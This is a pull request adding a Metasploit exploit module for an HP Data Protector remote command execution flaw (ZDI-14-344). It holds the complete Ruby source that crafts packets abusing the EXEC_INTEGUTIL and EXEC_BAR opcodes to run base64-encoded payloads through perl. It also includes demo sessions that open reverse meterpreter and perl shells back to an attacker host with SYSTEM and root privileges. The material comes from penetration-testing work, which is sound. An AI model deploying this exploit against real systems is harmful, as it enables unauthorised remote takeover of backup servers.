### PR TITLE
Add module for ZDI-14-344, HP Data Protector Remote Command Execution Vulnerability

### DIFF
--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -83,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
       version = $1
-      print_status("#{peer} - Windows / HP Data Protector version #{version} found")
+      vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
     elsif fingerprint =~ / INET/
-      print_status("#{peer} - Linux / HP Data Protector found")
+      vprint_status("#{peer} - Linux / HP Data Protector found")
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -151,7 +151,12 @@ class Metasploit3 < Msf::Exploit::Remote
     connect
 
     sock.put([2].pack("N") + "\xff\xfe")
-    res = sock.get_once(4)
+    begin
+      res = sock.get_once(4)
+    rescue EOFError
+      disconnect
+      return nil
+    end
 
     if res.nil?
       disconnect
@@ -160,8 +165,13 @@ class Metasploit3 < Msf::Exploit::Remote
       length = res.unpack("N")[0]
     end
 
-    res = sock.get_once(length)
-    disconnect
+    begin
+      res = sock.get_once(length)
+    rescue EOFError
+      return nil
+    ensure
+      disconnect
+    end
 
     if res.nil?
       return nil
@@ -176,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote
     sock.put(rand_text_alpha_upper(64))
     begin
     res = sock.get_once(4)
-    rescue ::Errno::ECONNRESET
+    rescue ::Errno::ECONNRESET, EOFError
       disconnect
       return nil
     end
@@ -188,8 +198,13 @@ class Metasploit3 < Msf::Exploit::Remote
       length = res.unpack("N")[0]
     end
 
-    res = sock.get_once(length)
-    disconnect
+    begin
+      res = sock.get_once(length)
+    rescue EOFError
+      return nil
+    ensure
+      disconnect
+    end
 
     if res.nil?
       return nil
@@ -212,7 +227,12 @@ class Metasploit3 < Msf::Exploit::Remote
     ])
 
     sock.put(pkt)
-    res = sock.get_once(4)
+    begin
+      res = sock.get_once(4)
+    rescue EOFError
+      disconnect
+      return nil
+    end
 
     if res.nil?
       disconnect
@@ -221,8 +241,13 @@ class Metasploit3 < Msf::Exploit::Remote
       length = res.unpack("N")[0]
     end
 
+    begin
     res = sock.get_once(length)
-    disconnect
+    rescue EOFError
+      return nil
+    ensure
+      disconnect
+    end
 
     if res.nil?
       return nil

--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -59,7 +59,13 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'Windows 64 bits / HP Data Protector 9',
             {
               'Platform' => 'win',
-              'Arch'     => ARCH_X86_64,
+              'Arch'     => ARCH_CMD,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'powershell'
+                }
+              }
             }
           ]
         ],
@@ -114,11 +120,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if target.name =~ /Windows/
-      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
-      print_status("#{peer} - Exploiting through Powershell...")
-      execute_windows(command, dir)
+      #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+      print_status("#{peer} - Executing payload...")
+      execute_windows(payload.encoded, dir)
     else
-      print_status("#{peer} - Exploiting payload...")
+      print_status("#{peer} - Executing payload...")
       execute_linux(payload.encoded, dir)
     end
   end

--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Powershell

--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -250,7 +250,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def valid_target?(dir)
-    if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\\\/
+    if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\/
       return true
     elsif target.name =~ /Linux/ && dir.start_with?('/')
       return true

--- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
+++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb
@@ -1,0 +1,323 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'HP Data Protector EXEC_INTEGUTIL Remote Code Execution',
+      'Description'     => %q{
+        This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
+        in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
+        request allows to execute arbitrary commands from a restricted directory. Since it
+        includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute
+        arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but
+        an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
+        Data Protector for linux.  This module has been tested successfully on HP Data Protector
+        9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
+      },
+      'Author'          =>
+        [
+          'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # vulnerability discovery
+          'juan vazquez'                                # msf module
+        ],
+      'References'      =>
+        [
+          [ 'ZDI', '14-344']
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          # The powershell embedded payload takes some time to deploy
+          'WfsDelay' => 20
+        },
+      'Targets'         =>
+        [
+          [ 'Linux 64 bits / HP Data Protector 9',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD,
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd cmd_bash',
+                  'RequiredCmd' => 'perl gawk bash-tcp openssl python generic'
+                }
+              }
+            }
+          ],
+          [ 'Windows 64 bits / HP Data Protector 9',
+            {
+              'Platform' => 'win',
+              'Arch'     => ARCH_X86_64,
+            }
+          ]
+        ],
+      'DefaultTarget'   => 0,
+      'Privileged'      => true,
+      'DisclosureDate'  => 'Oct 2 2014'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(5555)
+      ], self.class)
+  end
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
+      version = $1
+      print_status("#{peer} - Windows / HP Data Protector version #{version} found")
+    elsif fingerprint =~ / INET/
+      print_status("#{peer} - Linux / HP Data Protector found")
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if Gem::Version.new(version) <= Gem::Version.new('9')
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Detected # there is no patch at the time of module writing
+  end
+
+  def exploit
+    rand_exec = rand_text_alpha(8)
+    print_status("#{peer} - Leaking the HP Data Protector directory...")
+    leak = leak_hp_directory(rand_exec)
+    dir = parse_dir(leak, rand_exec)
+
+    if dir.nil?
+      dir = default_hp_dir
+      print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
+    else
+      unless valid_target?(dir)
+        print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
+      end
+    end
+
+    if target.name =~ /Windows/
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+      print_status("#{peer} - Exploiting through Powershell...")
+      execute_windows(command, dir)
+    else
+      print_status("#{peer} - Exploiting payload...")
+      execute_linux(payload.encoded, dir)
+    end
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def build_pkt(fields)
+    data = "\xff\xfe" # BOM Unicode
+    fields.each do |v|
+      data << "#{Rex::Text.to_unicode(v)}\x00\x00"
+      data << Rex::Text.to_unicode(" ") # Separator
+    end
+
+    data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
+    return [data.length].pack("N") + data
+  end
+
+  def get_fingerprint
+    fingerprint = get_fingerprint_windows
+    if fingerprint.nil?
+      fingerprint = get_fingerprint_linux
+    end
+
+    fingerprint
+  end
+
+  def get_fingerprint_linux
+    connect
+
+    sock.put([2].pack("N") + "\xff\xfe")
+    res = sock.get_once(4)
+
+    if res.nil?
+      disconnect
+      return nil
+    else
+      length = res.unpack("N")[0]
+    end
+
+    res = sock.get_once(length)
+    disconnect
+
+    if res.nil?
+      return nil
+    end
+
+    res
+  end
+
+  def get_fingerprint_windows
+    connect
+
+    sock.put(rand_text_alpha_upper(64))
+    begin
+    res = sock.get_once(4)
+    rescue ::Errno::ECONNRESET
+      disconnect
+      return nil
+    end
+
+    if res.nil?
+      disconnect
+      return nil
+    else
+      length = res.unpack("N")[0]
+    end
+
+    res = sock.get_once(length)
+    disconnect
+
+    if res.nil?
+      return nil
+    end
+
+    Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
+  end
+
+  def leak_hp_directory(rand_exec)
+    connect
+    pkt = build_pkt([
+      "2", # Message Type
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      "28", # Opcode EXEC_INTEGUTIL
+      rand_exec,
+    ])
+
+    sock.put(pkt)
+    res = sock.get_once(4)
+
+    if res.nil?
+      disconnect
+      return nil
+    else
+      length = res.unpack("N")[0]
+    end
+
+    res = sock.get_once(length)
+    disconnect
+
+    if res.nil?
+      return nil
+    end
+
+    if res =~ /No such file or directory/ # Linux signature
+      return res
+    else # deal as windows target
+      return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
+    end
+  end
+
+  def parse_dir(data, clue)
+    if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/
+      dir = $1
+      print_good("#{peer} - HP Data Protector directory found on #{dir}")
+    elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/
+      dir = $1
+      print_good("#{peer} - HP Data Protector directory found on #{dir}")
+    else
+      dir = nil
+    end
+
+    dir
+  end
+
+  def valid_target?(dir)
+    if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\\\/
+      return true
+    elsif target.name =~ /Linux/ && dir.start_with?('/')
+      return true
+    end
+
+    false
+  end
+
+  def default_hp_dir
+    if target.name =~ /Windows/
+      dir = 'C:\\Program Files\\OmniBack\\'
+    else # linux
+      dir = '/opt/omni/lbin/'
+    end
+
+    dir
+  end
+
+  def execute_windows(cmd, hp_dir)
+    connect
+    pkt = build_pkt([
+      "2", # Message Type
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      "28", # Opcode EXEC_INTEGUTIL
+      "perl.exe",
+      "-I#{hp_dir}lib\\perl",
+      "-MMIME::Base64",
+      "-e",
+      "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
+    ])
+    sock.put(pkt)
+    disconnect
+  end
+
+  def execute_linux(cmd, hp_dir)
+    connect
+    pkt = build_pkt([
+      '2', # Message Type
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      '11', # Opcode EXEC_BAR
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      "../bin/perl",
+      rand_text_alpha(8),
+      "-I#{hp_dir}lib/perl",
+      '-MMIME::Base64',
+      '-e',
+      "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
+    ])
+    sock.put(pkt)
+    disconnect
+  end
+end


### PR DESCRIPTION
Tested on Windows 2008 R2 64 bits and Centos 6 64 bits. With HP Data Protector 9.
## Verification
- [ ] Install a windows or linux operating system (or both) (Windows 2008 R2 64 bits and Centos 6 64 bits used for testing)
- [ ] Install HP Data Protector 9. Install the Cell Manager role. Software can be downloaded from: http://www8.hp.com/us/en/software-solutions/software.html?compURI=1175640#.VDnqCmRdXWo
- [ ] Test like in the demo, hopefully get sessions!
## DEMO
- Windows

```

msf > use exploit/multi/misc/hp_data_protector_exec_integutil
msf exploit(hp_data_protector_exec_integutil) > set rhost 172.16.158.252
rhost => 172.16.158.252
msf exploit(hp_data_protector_exec_integutil) > check

[*] 172.16.158.252:5555 - Windows / HP Data Protector version 09.00 found
[*] 172.16.158.252:5555 - The target appears to be vulnerable.
msf exploit(hp_data_protector_exec_integutil) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux 64 bits / HP Data Protector 9
   1   Windows 64 bits / HP Data Protector 9


msf exploit(hp_data_protector_exec_integutil) > set target 1
target => 1
msf exploit(hp_data_protector_exec_integutil) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(hp_data_protector_exec_integutil) > set lhost 172.16.158.1
msf exploit(hp_data_protector_exec_integutil) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.252:5555 - Leaking the HP Data Protector directory...
[+] 172.16.158.252:5555 - HP Data Protector directory found on C:\Program Files\OmniBack\
[*] 172.16.158.252:5555 - Exploiting through Powershell...
[*] Sending stage (972288 bytes) to 172.16.158.252
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.252:54336) at 2014-10-11 21:35:45 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-U8VOEHD956A
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
emeterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 172.16.158.252 - Meterpreter session 2 closed.  Reason: User exit
```
- Linux

```
msf exploit(hp_data_protector_exec_integutil) > set rhost 172.16.158.132
rhost => 172.16.158.132
msf exploit(hp_data_protector_exec_integutil) > check

[*] 172.16.158.132:5555 - Linux / HP Data Protector found
[*] 172.16.158.132:5555 - The target service is running, but could not be validated.
msf exploit(hp_data_protector_exec_integutil) > set target 0
target => 0
msf exploit(hp_data_protector_exec_integutil) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(hp_data_protector_exec_integutil) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(hp_data_protector_exec_integutil) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.132:5555 - Leaking the HP Data Protector directory...
[+] 172.16.158.132:5555 - HP Data Protector directory found on /opt/omni/
[*] 172.16.158.132:5555 - Exploiting payload...
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.132:50803) at 2014-10-11 21:36:18 -0500

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:inetd_child_t:s0-s0:c0.c1023
^C
Abort session 3? [y/N]  y

[*] 172.16.158.132 - Command shell session 3 closed.  Reason: User exit
```
